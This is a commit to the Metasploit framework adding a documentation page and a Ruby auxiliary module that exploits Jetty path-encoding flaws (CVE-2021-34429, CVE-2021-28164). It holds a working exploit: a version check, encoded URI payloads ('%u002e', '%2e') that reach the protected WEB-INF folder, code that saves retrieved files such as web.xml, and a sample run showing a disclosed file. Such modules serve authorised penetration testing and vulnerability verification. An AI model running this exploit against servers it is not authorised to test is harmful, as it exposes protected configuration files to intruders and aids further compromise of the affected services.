Land #15843, add Jetty WEB-INF file disclosure
This commit is contained in:
commit
b6dcb03b45
|
@ -0,0 +1,65 @@
|
|||
## Vulnerable Application
|
||||
|
||||
Jetty suffers from a vulnerability where certain encoded URIs and ambiguous paths can access
|
||||
protected files in the `WEB-INF` folder.
|
||||
|
||||
Versions effected are:
|
||||
|
||||
- 9.4.37.v20210219, 9.4.38.v20210224
|
||||
- 9.4.37-9.4.42
|
||||
- 10.0.1-10.0.5
|
||||
- 11.0.1-11.0.5
|
||||
|
||||
Exploitation can obtain any file in the `WEB-INF` folder, but web.xml is most likely
|
||||
to have information of value.
|
||||
|
||||
### CVE-2021-34429
|
||||
|
||||
Use the Docker image from [ColdFusionX](https://github.com/ColdFusionX/CVE-2021-34429) at
|
||||
https://github.com/ColdFusionX/CVE-2021-34429/blob/main/docker-compose.yml
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install Jetty with an app that contains a `WEB-INF` folder
|
||||
1. Start msfconsole
|
||||
1. Do: `use auxiliary/gather/jetty_web_inf_disclosure`
|
||||
1. Do: `set rhosts`
|
||||
1. Do: `run`
|
||||
1. You should get the contents of a file
|
||||
|
||||
## Options
|
||||
|
||||
### FILE
|
||||
|
||||
The file in the `WEB-INF` folder to retrieve. Defaults to `web.xml`
|
||||
|
||||
### CVE
|
||||
|
||||
Which vulnerability to use. Options: `CVE-2021-34429`, `CVE-2021-28164`. Defaults to `CVE-2021-34429`
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Jetty 11.0.5 from Docker
|
||||
|
||||
```
|
||||
resource (jetty.rb)> use auxiliary/gather/jetty_web_inf_disclosure
|
||||
resource (jetty.rb)> set rhosts 1.1.1.1
|
||||
rhosts => 1.1.1.1
|
||||
resource (jetty.rb)> set rport 8080
|
||||
rport => 8080
|
||||
resource (jetty.rb)> set verbose true
|
||||
verbose => true
|
||||
resource (jetty.rb)> run
|
||||
[*] Running module against 1.1.1.1
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Found version: 11.0.5
|
||||
[+] 11.0.5 vulnerable to CVE-2021-34429
|
||||
[!] The service is running, but could not be validated.
|
||||
[+] File stored to /home/h00die/.msf4/loot/20211108134054_default_1.1.1.1_jetty.web.xml_813220.xml
|
||||
[+] <!DOCTYPE web-app PUBLIC
|
||||
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
|
||||
"http://java.sun.com/dtd/web-app_2_3.dtd" >
|
||||
<web-app>
|
||||
<display-name>ColdFusionX - Web Application</display-name>
|
||||
</web-app>
|
||||
```
|
|
@ -0,0 +1,104 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
prepend Msf::Exploit::Remote::AutoCheck
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Jetty WEB-INF File Disclosure',
|
||||
'Description' => %q{
|
||||
Jetty suffers from a vulnerability where certain encoded URIs and ambiguous paths can access
|
||||
protected files in the WEB-INF folder. Versions effected are:
|
||||
9.4.37.v20210219, 9.4.38.v20210224 and 9.4.37-9.4.42, 10.0.1-10.0.5, 11.0.1-11.0.5.
|
||||
Exploitation can obtain any file in the WEB-INF folder, but web.xml is most likely
|
||||
to have information of value.
|
||||
},
|
||||
'Author' => [
|
||||
'h00die', # msf module
|
||||
'Mayank Deshmukh', # EDB module
|
||||
'cangqingzhe', # CVE-2021-34429
|
||||
'lachlan roberts <lachlan@webtide.com>', # CVE-2021-34429
|
||||
'charlesk40' # CVE-2021-28164
|
||||
],
|
||||
'References' => [
|
||||
[ 'EDB', '50438' ],
|
||||
[ 'EDB', '50478' ],
|
||||
[ 'URL', 'https://github.com/ColdFusionX/CVE-2021-34429' ],
|
||||
[ 'URL', 'https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm' ], # CVE-2021-34429
|
||||
[ 'URL', 'https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5' ], # CVE-2021-28164
|
||||
[ 'CVE', '2021-34429' ],
|
||||
[ 'CVE', '2021-28164' ]
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Notes' => {
|
||||
'Stability' => [ CRASH_SAFE ],
|
||||
'Reliability' => [ ],
|
||||
'SideEffects' => [ IOC_IN_LOGS ]
|
||||
},
|
||||
'DisclosureDate' => '2021-07-15',
|
||||
'Actions' => [
|
||||
[ 'READ_FILE', { 'Description' => 'Read file on the remote server from WEB-INF folder' } ],
|
||||
],
|
||||
'DefaultAction' => 'READ_FILE'
|
||||
)
|
||||
)
|
||||
register_options([
|
||||
Opt::RPORT(8080),
|
||||
OptString.new('FILE', [false, 'File in WEB-INF to retrieve', 'web.xml']),
|
||||
OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2021-34429', ['CVE-2021-34429', 'CVE-2021-28164']])
|
||||
])
|
||||
end
|
||||
|
||||
def check
|
||||
res = send_request_cgi('uri' => '/')
|
||||
return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
|
||||
return Exploit::CheckCode::Safe("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
|
||||
return Exploit::CheckCode::Safe("#{peer} - No Server header found") unless res.headers['Server']
|
||||
unless /Jetty\((?<version>[^)]+)\)/ =~ res.headers['Server']
|
||||
return Exploit::CheckCode::Safe("#{peer} - Unable to detect Jetty version from server header: #{res.headers['Server']}")
|
||||
end
|
||||
|
||||
vprint_status("Found version: #{version}")
|
||||
version = Rex::Version.new(version)
|
||||
|
||||
if version == Rex::Version.new('9.4.37.v20210219') || version == Rex::Version.new('9.4.38.v20210224')
|
||||
print_good("#{version} vulnerable to CVE-2021-28164")
|
||||
return Exploit::CheckCode::Detected
|
||||
elsif version.between?(Rex::Version.new('9.4.37'), Rex::Version.new('9.4.43')) ||
|
||||
version.between?(Rex::Version.new('10.0.1'), Rex::Version.new('10.0.6')) ||
|
||||
version.between?(Rex::Version.new('11.0.1'), Rex::Version.new('11.0.6'))
|
||||
print_good("#{version} vulnerable to CVE-2021-34429")
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Safe('Server not vulnerable')
|
||||
end
|
||||
|
||||
def pick_payload
|
||||
case datastore['CVE']
|
||||
when 'CVE-2021-34429'
|
||||
payload = '%u002e'
|
||||
when 'CVE-2021-28164'
|
||||
payload = '%2e'
|
||||
end
|
||||
|
||||
payload
|
||||
end
|
||||
|
||||
def run
|
||||
res = send_request_cgi('uri' => "/#{pick_payload}/WEB-INF/#{datastore['FILE']}")
|
||||
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
|
||||
fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
|
||||
path = store_loot("jetty.#{datastore['FILE']}", 'text/plain', target_host, res.body, datastore['FILE'], 'Jetty WEB-INF File')
|
||||
print_good("File stored to #{path}")
|
||||
print_good(res.body)
|
||||
end
|
||||
|
||||
end
|
Loading…
Reference in New Issue